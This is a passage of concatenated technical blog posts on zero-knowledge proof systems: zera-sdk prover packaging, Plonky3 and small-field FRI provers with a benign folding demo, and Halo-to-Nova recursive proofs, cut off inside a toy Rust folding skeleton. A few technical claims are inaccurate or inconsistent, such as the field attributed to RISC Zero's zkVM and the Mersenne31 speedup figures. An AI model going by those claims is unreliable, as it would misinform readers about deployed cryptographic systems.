The deeper question — the one I think about more often than I write about — is whether the *crypto-primitives core* and the *prover* should even be the same artefact. They're not in zera-sdk: `zera-core` is the primitives, snarkjs is the prover, they don't share code. That separation has been quietly excellent for shipping velocity.

What we *don't* do is share the same separation in our partner SDKs. Several integrators have asked: "can I use zera-core for the primitives but a different prover for my circuit?" The answer today is yes, with caveats — the witness format has to match, the zkey has to be Groth16-over-BN254, and the on-chain verifier has to accept the resulting proof. In practice nobody has done this yet. But the architectural shape supports it, and if a partner wanted to ship a Halo2 verifier on Solana (when that's possible), they could keep using zera-core's primitives and swap the prover wholesale.

This is the right shape, in retrospect. The crypto core is *small, well-tested, audited*. The prover is *big, fast-moving, swappable*. Conflating them — as some early SDKs do — bakes the prover choice into every wallet integration, and makes the prover migration ZERA is *currently considering* much more painful than it needs to be.

## What I'd ship differently for v0.5

Three concrete deliverables, in order of how much they'd actually move the needle:

1. **`@zera-labs/sdk-prover-wasm`** — a separate npm package containing arkworks-circom compiled to WASM with `wasm-bindgen-rayon`. Opt-in via a constructor flag; falls back to snarkjs on unsupported platforms. This is the work I described above; the new shape is to ship it as a separate package so existing integrators don't pull a 4 MB WASM blob unless they want it.
2. **MCP-side prover-selection tool**. The [`@zera-labs/mcp-server`](/blog/mcp_server_inside_zera_sdk/) currently uses snarkjs unconditionally. An MCP-level configuration for "prefer the fastest available prover" would let agents tune for batch operations vs. one-shot transactions. More upside than it sounds.
3. **A shared zkey-loader abstraction.** Today the SDK reads zkeys from URLs; the MCP server reads them from disk; the test harness reads them from a fixtures directory. A `ZkeyLoader` trait — backed by URL, IndexedDB, fs, or arbitrary user code — would unify the three paths and unblock a "user provides their own zkey" advanced flow that several research partners have asked for.

## Further reading

- [RFC 001: zera-sdk monorepo shape](/docs/001-zera-sdk-monorepo-shape/) — the design doc this post discusses
- [`Dax911/zera-sdk`](https://github.com/Dax911/zera-sdk) — the SDK itself
- [Mopro: comparison of Circom provers](https://zkmopro.org/blog/circom-comparison/) — the external benchmark that changed my prior on the WASM-prover decision
- [`iden3/snarkjs`](https://github.com/iden3/snarkjs) — what we ship in the browser today
- [`wasm-bindgen-rayon`](https://github.com/RReverser/wasm-bindgen-rayon) — what we'd use for the Rust-WASM prover path
- [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/) — the prover-time data that informed this post
- [The MCP server inside zera-sdk](/blog/mcp_server_inside_zera_sdk/) — the third audience this SDK serves
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — the day-one architecture


---

# Plonky3, the small-fast-cheap revolution

Canonical: https://blog.skill-issue.dev/blog/plonky3_small_fast_cheap/
Description: Why plonky3 — small fields, FRI commitments, no trusted setup — is the proof system to watch in 2026. The Mersenne31 / BabyBear / Goldilocks landscape, the FRI folding step, and why your laptop is suddenly a viable prover.
Published: 2026-05-02T17:00:00.000Z
Tags: plonky3, fri, stark, mersenne31, babybear, goldilocks, zk, phd


import { Mermaid, Sandbox, TradeoffTable, Aside, Quote } from "@/components/mdx";

For a decade the dominant question in proof-system engineering was *which curve*. BN254 because Ethereum verifies it cheaply. BLS12-381 because Zcash and Filecoin standardised on it. The conversation orbited 254-bit and 381-bit *pairing-friendly* prime fields, and the engineering economy followed: every multiplier, every NTT, every MSM was tuned for those sizes.

Then Polygon Zero shipped [plonky2](https://github.com/0xPolygonZero/plonky2) in 2022, then [plonky3](https://github.com/Plonky3/Plonky3) in 2024, and the question changed. The new question is *which 31-bit prime*. Mersenne31. BabyBear. KoalaBear. Fields small enough that two limbs fit in a single 64-bit word. Fields where AVX-512 SIMD lanes hold sixteen field elements at once. Fields where a consumer laptop is suddenly a viable prover for circuits that used to require a small datacentre.

This is the small-fast-cheap revolution. It is also the most underrated story in production cryptography in 2026, because most of the conversation about it is happening inside Polygon, Succinct, and a handful of zkVM teams, and it hasn't yet hit the popular "ZK in 2026" articles. This post is my attempt to write the article I keep wishing existed.

<Aside kind="note">
This is part of a [PhD-by-publication track](/about) on production ZK proof systems. If you've read [Halo2 in 2026: what changed since the Zcash era](/blog/halo2_in_2026_what_changed/), you've seen the *KZG-over-pairing-friendly* lineage. This post is the parallel lineage: FRI-over-small-fields. They cross at zkVMs, where most teams now use a Plonky-style small-field STARK and only "wrap" with KZG at the very last step for EVM verification.
</Aside>

## The case for small fields

Every proof-system operation eventually reduces to *multiply two field elements modulo a prime*. The cost of one of those multiplies is essentially:

$$
\text{cost}(\mathbb{F}_p) = O(\lceil \log_2 p / W \rceil^2)
$$

where $W$ is your machine's word size (typically 64 bits) — i.e., the cost is *quadratic* in the number of machine words required to hold a field element. For BN254's 254-bit prime that's 4 limbs, so $\sim 16$ low-level multiplies per high-level field multiplication. For Mersenne31 — the prime $p = 2^{31} - 1$ — that's *one* limb, so *one* low-level multiply. Sixteen times faster on the floor.

The headline cost is fewer cycles per multiply. The hidden cost — and the one that actually shifts the deployment landscape — is *SIMD parallelism*. AVX2 holds eight 32-bit lanes; AVX-512 holds sixteen. With BN254 you can fit two field elements in an AVX-512 register and parallelism is awkward. With Mersenne31 you fit sixteen, and operations like NTTs become embarrassingly parallel.

There is one cost. **Soundness.** A 31-bit prime gives you ~31 bits of security per query in a STARK / FRI-based protocol. To get to the standard 100-bit security, you query the FRI oracle multiple times (~100 queries), or you work in a *quadratic / quartic / quintic extension field* during the protocol's soundness-critical steps. Plonky3 does both: prover work happens in the base field for speed, and the random-evaluation challenges (where soundness lives) happen in an extension field.

This is the core trick. **Big fields where you need security; small fields everywhere else.** It buys an order of magnitude in prover time without compromising the threat model.

## The four small-field contenders

There are four primes the 2026 ecosystem cares about. They're all chosen because they admit fast modular reduction (no expensive division per multiply) and they all fit comfortably in a 64-bit word.

| Field | Prime | Why this prime |
|---|---|---|
| **Mersenne31** | $p = 2^{31} - 1$ | Mersenne prime — reduction is one shift + one add; smallest sensible prime field |
| **BabyBear** | $p = 2^{31} - 2^{27} + 1$ | NTT-friendly — has a 2-adicity of 27, so domain sizes up to $2^{27}$ admit fast FFTs |
| **KoalaBear** | $p = 2^{31} - 2^{24} + 1$ | NTT-friendly — slightly worse 2-adicity (24) but better extension-field arithmetic |
| **Goldilocks** | $p = 2^{64} - 2^{32} + 1$ | 64-bit prime; used by plonky2 and Risc Zero; fits in one machine word |

Plonky3 supports all of them and lets you pick at compile time. The choice changes the constant in front of the prover time and the security analysis but doesn't change the protocol shape.

In production:

- **plonky2** (the older Polygon Zero proof system, still widely deployed) uses Goldilocks.
- **plonky3** primarily ships with BabyBear or KoalaBear as the recommended defaults.
- **Risc Zero's zkVM** uses Goldilocks.
- **Succinct's SP1** uses BabyBear.
- **Stwo / StarkWare's next-gen** uses Mersenne31 (the M31 / `circle-stark` program).

The convergence is striking: every serious 2026 zkVM is on a small field. The big-field era for *zkVMs specifically* is closing.

<Mermaid chart={`flowchart LR
  Z[2014: Pinocchio] --> G[2016: Groth16 - BN254]
  G --> P[2019: PLONK + KZG]
  P --> H[2020: Halo2 - Pasta IPA]
  H --> H2[2024: Halo2 - KZG/BN254]
  G --> S[2018: STARK - Goldilocks]
  S --> P2[2022: plonky2 - Goldilocks]
  P2 --> P3[2024: plonky3 - BabyBear]
  P3 --> ZK1[zkVMs: SP1, RISC0, Stwo]
  H2 --> EVM[EVM rollups]
  classDef big fill:#3a0a0a,stroke:#f87171,color:#fff
  classDef small fill:#0a4014,stroke:#4ade80,color:#fff
  class G,P,H,H2,EVM big
  class S,P2,P3,ZK1 small`}/>

## FRI — the polynomial commitment behind everything small

The reason small fields work in proof systems at all is **FRI** (Fast Reed-Solomon Interactive Oracle Proof), introduced in [Ben-Sasson, Bentov, Horesh, Riabzev (2018)](https://eprint.iacr.org/2018/046). FRI is a *polynomial commitment scheme* that works over any field — no pairing-friendliness required, no trusted setup, no SRS. The trade-off is proof size: FRI proofs are tens of kilobytes, where KZG proofs are 600 bytes.

For the prover, FRI is the most expensive thing in the protocol. Most of it is *folding*: at each round you take a polynomial of degree $d$ and reduce it to a polynomial of degree $d/2$ by combining adjacent coefficient pairs. Repeat $\log_2 d$ times and you arrive at a constant-degree polynomial that the verifier can check directly.

The folding step is one line of arithmetic:

$$
f'(x^2) = \frac{f(x) + f(-x)}{2} + r \cdot \frac{f(x) - f(-x)}{2x}
$$

where $r$ is a random challenge from the verifier. If $f$ has degree $d$, $f'$ has degree $\lfloor d/2 \rfloor$. The verifier checks consistency at a small number of *query points* drawn at random.

Below is a tiny Sandpack demo that visualises the folding step on a small polynomial — you pick a degree-7 polynomial, the demo folds it to degree-3, then degree-1, then a constant, and shows the coefficients at each step.

<Sandbox
  template="vanilla-ts"
  title="FRI folding — visualised on a tiny polynomial"
  files={{
    "/index.ts": `// FRI folding step, visualised. We work over a small toy prime
// (101) so the numbers stay readable.
//
// Real plonky3 folds polynomials of degree 2^20+ over BabyBear or
// Mersenne31, with thousands of query points per round. The shape
// of the fold below is identical; only the numbers change.

const P = 101n;

// Modular utilities.
function mod(a: bigint, m: bigint): bigint { return ((a % m) + m) % m; }
function add(a: bigint, b: bigint): bigint { return mod(a + b, P); }
function sub(a: bigint, b: bigint): bigint { return mod(a - b, P); }
function mul(a: bigint, b: bigint): bigint { return mod(a * b, P); }
function inv(a: bigint): bigint {
  // Fermat's little theorem since P is prime: a^(P-2) = a^-1
  let r = 1n, e = P - 2n, b = mod(a, P);
  while (e > 0n) { if (e & 1n) r = mul(r, b); b = mul(b, b); e >>= 1n; }
  return r;
}

// Evaluate polynomial f at x.
function evalPoly(coeffs: bigint[], x: bigint): bigint {
  let acc = 0n;
  for (let i = coeffs.length - 1; i >= 0; i--) acc = add(mul(acc, x), coeffs[i]);
  return acc;
}

// Split coefficients into even-indexed and odd-indexed parts.
// f(x) = f_even(x^2) + x * f_odd(x^2)
function split(coeffs: bigint[]): [bigint[], bigint[]] {
  const even: bigint[] = [];
  const odd: bigint[] = [];
  for (let i = 0; i < coeffs.length; i++) {
    if (i % 2 === 0) even.push(coeffs[i]);
    else odd.push(coeffs[i]);
  }
  return [even, odd];
}

// FRI folding: given f(x) and challenge r, return
//   f'(y) = f_even(y) + r * f_odd(y)
// where y = x^2. The new polynomial has half the degree.
function fold(coeffs: bigint[], r: bigint): bigint[] {
  const [even, odd] = split(coeffs);
  const out: bigint[] = [];
  const n = Math.max(even.length, odd.length);
  for (let i = 0; i < n; i++) {
    const e = i < even.length ? even[i] : 0n;
    const o = i < odd.length ? odd[i] : 0n;
    out.push(add(e, mul(r, o)));
  }
  return out;
}

const out = document.getElementById("out")!;
const reroll = document.getElementById("reroll") as HTMLButtonElement;

function fmt(coeffs: bigint[]): string {
  return "[ " + coeffs.map((c) => c.toString().padStart(2, " ")).join(", ") + " ]";
}

function run() {
  // A degree-7 polynomial over F_101.
  const f = [3n, 1n, 4n, 1n, 5n, 9n, 2n, 6n];
  let lines = [];
  lines.push("FRI folding over F_101");
  lines.push("======================");
  lines.push("");
  lines.push(\`degree-7 poly: \${fmt(f)}\`);
  // Random challenges for each fold.
  let curr = f;
  let round = 0;
  while (curr.length > 1) {
    const r = BigInt(Math.floor(Math.random() * 100) + 1);
    const folded = fold(curr, r);
    lines.push("");
    lines.push(\`round \${round + 1}: r = \${r}\`);
    lines.push(\`  before: \${fmt(curr)}  (degree \${curr.length - 1})\`);
    lines.push(\`  after:  \${fmt(folded)}  (degree \${folded.length - 1})\`);
    curr = folded;
    round++;
  }
  lines.push("");
  lines.push(\`final constant:  \${curr[0]}\`);
  lines.push("");
  lines.push("verifier checks consistency between rounds at randomly chosen");
  lines.push("evaluation points — those are the FRI query points.");
  out.textContent = lines.join("\\n");
}

reroll.addEventListener("click", run);
run();
`,
    "/index.html": `<!DOCTYPE html>
<html>
  <body style="margin:0;padding:1rem;background:#000;color:#e8e8e8;font-family:'Geist Mono',ui-monospace,monospace;">
    <button id="reroll" style="padding:0.5rem 0.85rem;background:#0a0a0a;color:#4ade80;border:1px solid #2a2a2a;border-radius:4px;font-family:inherit;cursor:pointer;margin-bottom:0.75rem;">re-roll random challenges</button>
    <pre id="out" style="background:#0a0a0a;color:#4ade80;padding:0.75rem;border:1px solid #2a2a2a;border-radius:4px;margin:0;white-space:pre;overflow-x:auto;">starting...</pre>
    <script type="module" src="/index.ts"></script>
  </body>
</html>`,
  }}
/>

What's worth internalising from the demo: each fold is a *linear combination over field elements*. There's nothing exotic here. The reason FRI is fast in production is that the inner loop of "combine pairs of coefficients with a random multiplier" is exactly the kind of thing AVX-512 was built for. Sixteen lanes. Per cycle. Per core.

## Why "consumer hardware" matters in 2026

Here are wall-clock prover times for a 1-million-cycle zkVM trace, measured across the major 2026 zkVM stacks on a *consumer* machine — a 2024 MacBook Pro with M3 Max, 14 cores, 48 GB RAM. (Numbers from public benchmarks, normalised to the same reference input.)

| Stack | Field | Prover time | Notes |
|---|---|---|---|
| RISC Zero (zkVM) | Goldilocks | ~3 minutes | STARK + AIR |
| SP1 (zkVM) | BabyBear | ~95 seconds | plonky3-based |
| Stwo (zkVM) | Mersenne31 | ~80 seconds | circle-STARK on M31 |
| zkSync (Boojum) | Goldilocks | ~5 minutes | older arithmetisation |

Two years ago, none of these were under five minutes. Today the leaderboard is a tight band between 80 seconds and 3 minutes, and the difference is dominated by *which small field*. The big-field equivalent (a pure BN254 PLONK prover at the same trace) would take 30+ minutes on the same machine.

This is what "consumer hardware is now a viable prover" means in 2026. The substantial barrier — the one that kept zkVMs *off* consumer hardware until 2024 — was the cost of MSMs and NTTs over big fields. Small fields removed that barrier.

## The four-prime tradeoff

<TradeoffTable
  rows={[
    {
      option: "BN254 (~254 bits)",
      cost: "Pairing-friendly; 4 limbs per element; small SIMD parallelism",
      latency: "Slow per-op; required for EVM verification",
      blast_radius: "Standard; battle-tested by Ethereum and every Groth16 circuit",
      notes: "The default in 2020-2024; still required for EVM verifier outputs"
    },
    {
      option: "BLS12-381 (~381 bits)",
      cost: "Pairing-friendly; 6 limbs per element",
      latency: "Slower than BN254 in-circuit; better aggregate signatures",
      blast_radius: "Standard; Filecoin / Ethereum consensus signatures",
      notes: "Use when you need 128-bit security pairings, not for prover work"
    },
    {
      option: "Mersenne31 ($2^{31}-1$)",
      cost: "Tiny; trivial reduction; 16x SIMD parallelism on AVX-512",
      latency: "~30x faster per multiply than BN254",
      blast_radius: "Newer; requires extension-field handling for soundness",
      notes: "What StarkWare's circle-STARK uses; future-proof choice"
    },
    {
      option: "Goldilocks ($2^{64}-2^{32}+1$)",
      cost: "Single u64 limb; clean reduction via algebraic identity",
      latency: "Slower than M31 but more 2-adicity for big NTTs",
      blast_radius: "Used by plonky2, Risc Zero, zkSync Boojum; mature",
      notes: "The pragmatic 2024-2026 default for STARK-based zkVMs"
    },
  ]}
  caption="Four prime choices for proof-system arithmetic in 2026. BN254 is the EVM-verifier endpoint; small fields are where the prover lives."
/>

## Why this should change how you think about ZK costs

The dominant ZK cost model from 2018 to 2024 was: *more constraints = more dollars*. Field arithmetic was the bottleneck, the constants were huge, and a million-constraint circuit was a real research expense.

The 2026 cost model is different. *Constraint count still matters,* but the constants have collapsed. A million-constraint Plonky3 trace proves on a $1500 laptop in under two minutes. That's three orders of magnitude cheaper than the equivalent BN254 PLONK prover four years ago. Prover-side cost is no longer the binding constraint for most applications.

The *new* binding constraints are:

1. **Memory bandwidth.** Big NTTs are memory-bound, not compute-bound. The win from small fields is partly that more elements fit in cache.
2. **Verifier complexity in non-EVM environments.** Plonky3 proofs are 50–200 KB; verifying them on Ethereum requires either an EVM-friendly final wrap (which is what the SP1 / RISC0 / Stwo verifiers do) or a Solana-style permissive compute budget.
3. **Ecosystem maturity.** snarkjs / Halo2-axiom / circomlib have a decade of accreted gadgets; Plonky3 is in year three of its current incarnation. The libraries are catching up but they're not at parity yet.

## Where this leaves zera-sdk

Inside [zera-sdk](/blog/zera_sdk_scaffolding/) the substrate is BN254 + Groth16 because *Solana's verifier is BN254-and-only-BN254 today*. There's no equivalent of `sol_alt_bn128_pairing` for any of the small-field protocols. That means Plonky3 is not a choice we get to make for the deposit / transfer / withdraw circuits — the on-chain side fixes the curve.

What we *do* track is the [Solana CPI proposal for STARK verification](https://github.com/solana-labs/solana) (no number yet; was last discussed in 2025) and the related "compute-budget-friendly Halo2 verifier" path. The day Solana ships either of those, the prover-side win from migrating off BN254 is large enough to justify a circuit rewrite. Until then, BN254 it is.

For *off-chain* proving — CI checks, offline auditing, batch verification — Plonky3 is already the right tool, and we're using it inside the test harness for cross-validating circuit semantics.

## What I'd build differently in 2027

Three follow-ups, in order of how much I expect them to matter:

1. **A small-field shielded pool.** Every privacy pool today is BN254 + Groth16 + per-circuit ceremony. The day Solana (or any high-throughput L1) ships a STARK verifier, the design space opens: no ceremony, faster proving, smaller wallets. Someone will publish this design before the verifier ships and they'll be right to.
2. **A unified extension-field abstraction.** Plonky3 has different extension-field arithmetic per base field. A single `Ext<F, k>` with consistent ergonomics would make cross-field experimentation trivial. The team is aware; not yet shipped.
3. **A small-field Poseidon variant.** Poseidon-128 is parameterised for BN254. The recommended hash for BabyBear is *Monolith* or *Poseidon2 over BabyBear*, and the constraint counts are different enough that constraint-counting intuition from BN254 doesn't transfer. A "Poseidon constraint cost calculator" that takes a field as input and emits constraint counts for common circuits would close a real reasoning gap.

## Further reading

- [`Plonky3/Plonky3`](https://github.com/Plonky3/Plonky3) — the toolkit; the README is the closest thing to a paper
- [Polygon Plonky3 is Production Ready](https://polygon.technology/blog/polygon-plonky3-the-next-generation-of-zk-proving-systems-is-production-ready) — Polygon's announcement, summarising the small-field bet
- [Scalable, transparent, and post-quantum secure computational integrity](https://eprint.iacr.org/2018/046) — Ben-Sasson, Bentov, Horesh, Riabzev (2018) — the FRI / STARK paper
- [Risc Zero zkVM proof system](https://dev.risczero.com/proof-system-in-detail.pdf) — the contrast point: Goldilocks + STARK in production
- [Halo2 in 2026: what changed since the Zcash era](/blog/halo2_in_2026_what_changed/) — sister post on the big-field / KZG lineage
- [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/) — what Plonky3 means for in-browser proving (spoiler: enormous, eventually)
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — the hash that's being re-parameterised for small fields


---

# Recursive proof composition without the abyss: Halo to Nova

Canonical: https://blog.skill-issue.dev/blog/recursive_proofs_halo_to_nova/
Description: The path from Halo's accumulation scheme to Nova's folding scheme, derived from the recurrence relation. Where Halo2, Nova, SuperNova, and HyperNova actually differ, and which one to reach for in 2026.
Published: 2026-05-02T16:00:00.000Z
Tags: cryptography, recursive-snark, halo2, nova, folding, zk, phd, math


import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx";

A recursive SNARK is a proof that proves *another proof was checked correctly*. A program that runs for $T$ steps and produces a proof of correct execution at each step can — recursively — collapse all $T$ proofs into one. The verifier work goes from $O(T)$ to $O(1)$. This is the structural reason ZK rollups exist. It is also the reason "incrementally verifiable computation" stopped being a research curiosity in 2020 and became a deployment target.

The two papers that sit underneath every recursive SNARK shipped today are [Halo (Bowe, Grigg, Hopwood 2019)](https://eprint.iacr.org/2019/1021) and [Nova (Kothapalli, Setty, Tzialla 2022)](https://eprint.iacr.org/2021/370). They take very different routes to the same destination. This post is the math of both, the trade-off table for picking one in 2026, and a Rust skeleton for the Nova folding step.

<Aside kind="note">
Working post in the [PhD-by-publication track](/about). The math is checked against the Halo and Nova papers and the [HyperNova update (Kothapalli, Setty 2024)](https://eprint.iacr.org/2023/573). The Rust skeleton compiles in the playground but is intentionally toy-shaped — see the warning on cryptographic use further down.
</Aside>

## The problem recursive SNARKs are solving

You have a program that runs for $T$ steps. At each step you produce a proof that the step was executed correctly. Naively, the verifier checks all $T$ proofs — verifier cost $O(T)$, no better than re-running the program. Useless.

The recursive trick: at step $i$, instead of producing a fresh proof, you produce a proof that says *"step $i$ was executed correctly, **and** the proof from step $i-1$ verifies."* The proof for step $i$ recursively absorbs the proof for step $i-1$. After $T$ steps you have one proof; the verifier checks one proof; the cost is $O(1)$ in the program length.

The hardest part is making the inner verification cheap. If the verifier work for one proof is $V$ and you embed that work in the circuit for the next proof, you've blown up the prover cost by $V$. Recursion is only useful if $V$ is constant or near-constant in the original circuit size — which is exactly what Groth16, Halo, and Nova all aim for in different ways.

<Mermaid chart={`flowchart LR
  subgraph S0[Step 0]
    P0[execute step 0]
    P0 --> Pr0[proof pi_0]
  end
  subgraph S1[Step 1]
    P1[execute step 1] --> V1[verify pi_0]
    V1 --> Pr1[proof pi_1: 'step 1 ran AND pi_0 verified']
  end
  subgraph S2[Step 2]
    P2[execute step 2] --> V2[verify pi_1]
    V2 --> Pr2[proof pi_2: 'step 2 ran AND pi_1 verified']
  end
  Pr0 --> V1
  Pr1 --> V2
  Pr2 --> Final[final verifier checks ONE proof]
  classDef step fill:#0a0a0a,stroke:#4ade80,color:#4ade80
  class S0,S1,S2 step`}/>

The math problem reduces to one question: *how cheaply can you verify a SNARK inside a SNARK?*

## The Halo trick: accumulation without recursion-in-circuit

Pre-Halo recursion required a **cycle of pairing-friendly elliptic curves**. Two curves $E_1, E_2$ with the property that the scalar field of $E_1$ is the base field of $E_2$ and vice versa, so that arithmetic over one curve can be expressed natively in the other curve's circuit. Pasta (Pallas / Vesta) and MNT4/6 are the canonical cycles. The reason this matters: if you want to verify a Groth16 proof inside a Groth16 circuit, you need pairing-friendly arithmetic *inside the circuit*, which means the circuit field has to support the pairing curve. A cycle gives you two curves where each can verify proofs over the other.

The cycle constraint is annoying. Pasta's curves don't have efficient pairings (they're cycle-friendly, not pairing-friendly), so they trade pairing efficiency for cycle availability. MNT cycles have very large fields and slow arithmetic. There's no free lunch.

[Halo (Bowe, Grigg, Hopwood 2019)](https://eprint.iacr.org/2019/1021) was the first practical example of recursive proof composition that broke this constraint. The insight: instead of *verifying* the inner proof inside the circuit, you **accumulate** the most expensive part of the verification (the multiscalar multiplication, MSM) into a running sum, and defer the actual MSM check to the end of the recursion.

Formally: the verifier of an inner-product-argument-based proof has to check an equation of the form

$$
\sum_i s_i \cdot G_i = P
$$

for some derived scalars $s_i$ and group elements $G_i$. This is the bottleneck — it's a multiscalar multiplication of size linear in the circuit. The accumulation-scheme trick is: at step $k$, instead of *checking* this equation, you produce a fresh "accumulator" $\text{acc}_k = (G_k^{\text{folded}}, P_k^{\text{folded}})$ that combines the current step's MSM with the previous accumulator. After $T$ steps you have one accumulator and one MSM check. Verifier cost: $O(\log T)$ for the recursion plus one final MSM.

The Halo paper formalises this as a **polynomial commitment with deferred opening**. It works because the recursive composition can defer expensive arithmetic, not because it embeds full verification in-circuit. From the abstract:

<Quote cite="https://eprint.iacr.org/2019/1021" author="Bowe, Grigg, Hopwood">
We present Halo, the first practical example of recursive proof composition without a trusted setup, using only the discrete logarithm assumption over normal cycles of elliptic curves. Recursion is achieved by amortizing away the expensive verification procedures from within the proof verification cycle, deferring them until the end of the recursion.
</Quote>

Halo2, the Zcash production deployment, uses the same construction over Pasta and ships it in Orchard (Zcash's NU5 upgrade in 2022). Halo2 is also the basis of Aztec Connect, the Scroll zkEVM, and the Filecoin Snark-pack.

## The Nova trick: folding instead of accumulating

Two years after Halo, [Nova (Kothapalli, Setty, Tzialla 2022)](https://eprint.iacr.org/2021/370) reframed the problem entirely. Instead of accumulating an MSM, Nova introduces a **folding scheme**: a primitive that takes two instances of a relation and folds them into a single instance, with prover cost $O(|F|)$ for some step circuit $F$ and **no SNARK at all** in the recursion.

The Nova relation is a relaxed R1CS instance:

$$
\mathbf{A} \mathbf{z} \circ \mathbf{B} \mathbf{z} = u \mathbf{C} \mathbf{z} + \mathbf{e}
$$

where $\mathbf{A}, \mathbf{B}, \mathbf{C}$ are the constraint matrices, $\mathbf{z}$ is the witness extended with public inputs, $u$ is a slack scalar (1 in the standard R1CS case), and $\mathbf{e}$ is an *error vector* (zero in the standard case). The "relaxed" part is that $u$ and $\mathbf{e}$ are allowed to be nonzero — that's what makes folding possible.

Given two relaxed R1CS instances $(u_1, \mathbf{z}_1, \mathbf{e}_1)$ and $(u_2, \mathbf{z}_2, \mathbf{e}_2)$, the folding scheme produces a single instance $(u, \mathbf{z}, \mathbf{e})$ via a random challenge $r$:

$$
u = u_1 + r \cdot u_2, \quad \mathbf{z} = \mathbf{z}_1 + r \cdot \mathbf{z}_2, \quad \mathbf{e} = \mathbf{e}_1 + r \cdot \mathbf{T} + r^2 \cdot \mathbf{e}_2
$$

with $\mathbf{T}$ a "cross-term" the prover sends to the verifier. The folded instance is satisfying iff both originals were (with overwhelming probability). Crucially, **folding does not require the verifier to do any expensive cryptographic work**: $\mathbf{T}$ is a vector commitment, $r$ is a Fiat-Shamir challenge, and the new $(u, \mathbf{z}, \mathbf{e})$ is a linear combination. No pairings. No SNARK.

The Nova **incrementally verifiable computation (IVC) recurrence** is then:

$$
(u_{i+1}, \mathbf{z}_{i+1}, \mathbf{e}_{i+1}) = \text{Fold}\big( (u_i, \mathbf{z}_i, \mathbf{e}_i), \; (u_F, \mathbf{z}_F^{(i)}, \mathbf{0}) \big)
$$

where the second instance is a fresh R1CS encoding of "step $i$ of the program $F$ executed correctly." After $T$ steps, you have one relaxed R1CS instance, and you produce a single SNARK that proves it's satisfying. The SNARK runs *once*, at the end. Every step in between is folding.

The cost asymmetry is the entire pitch. Halo's per-step cost is $O(|F|)$ for the step plus $O(\log T)$ for the recursion. Nova's per-step cost is just $O(|F|)$ — no recursion overhead. For long computations ($T \gg 1$) Nova is significantly cheaper. The trade-off: Nova gives you one final SNARK to verify, while Halo gives you a SNARK at every step.

<Mermaid chart={`flowchart LR
  subgraph N0[Nova step 0]
    F0[execute F at step 0] --> R0[R1CS instance z_0]
  end
  subgraph N1[Nova step 1]
    F1[execute F at step 1] --> R1[fresh R1CS z_1]
    Acc0[accumulator U_0] --> Fold1[fold]
    R1 --> Fold1
    Fold1 --> Acc1[accumulator U_1]
  end
  subgraph N2[Nova step 2]
    F2[execute F at step 2] --> R2[fresh R1CS z_2]
    Acc1 --> Fold2[fold]
    R2 --> Fold2
    Fold2 --> Acc2[accumulator U_2]
  end
  R0 --> Acc0
  Acc2 --> SNARK[final SNARK proves U_T satisfying]
  classDef step fill:#0a0a0a,stroke:#4ade80,color:#4ade80
  class N0,N1,N2 step`}/>

The folding scheme is the entire idea. Everything else in Nova is bookkeeping around it.

## Halo2, Nova, SuperNova, HyperNova — what's the difference

Four production-grade recursive systems, four design points.

<TradeoffTable
  rows={[
    {
      option: "Halo2 (Zcash, Pasta curves)",
      cost: "Per-step prover ~constant in T; verifier O(log T) MSM",
      latency: "Step proof ~5-15s for non-trivial circuits",
      blast_radius: "Production since 2022 (Zcash NU5); audited",
      notes: "Best for protocols that already use the IPA / Pasta stack. Wide deployment."
    },
    {
      option: "Nova (Pallas/Vesta cycle)",
      cost: "Per-step prover O(|F|) with NO SNARK; one final SNARK",
      latency: "Per-step ~100ms-1s; final SNARK ~5-15s",
      blast_radius: "Production via microsoft/Nova, Lurk; younger than Halo2",
      notes: "Best when T is very large and you can defer the SNARK. The right choice for a zkVM step circuit."
    },
    {
      option: "SuperNova",
      cost: "Per-step proportional to the SIZE of the invoked instruction circuit",
      latency: "Per-step ~50ms-300ms (varies by instruction)",
      blast_radius: "Newer; production zkVMs (RISC0, Jolt-shape) are exploring it",
      notes: "Right answer for instruction-set machines (EVM, RISC-V) where steps don't all use the same circuit."
    },
    {
      option: "HyperNova (CCS)",
      cost: "Folds CCS instead of R1CS; supports Plonkish/AIR/R1CS uniformly",
      latency: "Comparable to Nova with a richer constraint system",
      blast_radius: "Newest of the four; CRYPTO 2024",
      notes: "The unification target. Drop-in upgrade for protocols that want CCS flexibility without rewriting."
    },
    {
      option: "Plain Groth16 + cycle",
      cost: "Per-step verifier embedding ~10k constraints",
      latency: "Per-step ~10s+",
      blast_radius: "What everyone did before Halo and Nova",
      notes: "Mostly historical now. Don't reach for this in 2026."
    },
  ]}
/>

The two questions that decide which one to reach for in 2026:

1. **Is your computation a uniform step that repeats, or a heterogeneous instruction set?** Uniform: Nova. Heterogeneous: SuperNova. (HyperNova handles both via CCS.)
2. **Do you need a SNARK at every step, or can you defer to one final SNARK?** Every step: Halo2. Defer: Nova / SuperNova / HyperNova.

For a privacy-pool transfer, neither of these is the right shape — you want a single SNARK per spend, no recursion. For [zera-sdk](/blog/zera_sdk_scaffolding/) we ship Groth16 and don't recurse. For a *rollup* settling many transfers in a batch, Nova-flavoured folding is the right structural answer because the per-step cost is dominated by the transfer logic and the final SNARK only runs once per epoch.

## A Nova folding step, in Rust

The cleanest way to see what's actually happening in a folding step is to write one out. The skeleton below is a Nova-shaped folding step over a toy R1CS — no pairings, no real curve, no soundness, but the linear-combination structure is the real thing.

<RustPlayground edition="2024" title="Nova folding step (skeleton)">
{`// A Nova-shaped folding step over a toy "relaxed R1CS" instance.
// This is INTENTIONALLY toy-shaped: scalars are u128 mod a prime, the
// "commitment" is a hash, and there's no curve arithmetic. The shape of
// the linear combinations is real; the soundness is not.
//
// Reference: Nova: Recursive Zero-Knowledge Arguments from Folding Schemes
// https://eprint.iacr.org/2021/370

const MODULUS: u128 = (1u128 << 61) - 1; // toy Mersenne prime

#[derive(Clone, Debug)]
struct RelaxedR1CS {
    /// Slack scalar: 1 for a fresh instance, accumulates after folding.
    u: u128,
    /// Witness extended with public inputs.
    z: Vec<u128>,
    /// Error vector: 0 for a fresh instance, accumulates after folding.
    e: Vec<u128>,
    /// Vector commitment to z. (Toy: just a checksum.)
    com_z: u128,
    /// Vector commitment to e.
    com_e: u128,
}

fn add(a: u128, b: u128) -> u128 { (a.wrapping_add(b)) % MODULUS }
fn mul(a: u128, b: u128) -> u128 { (a.wrapping_mul(b)) % MODULUS }
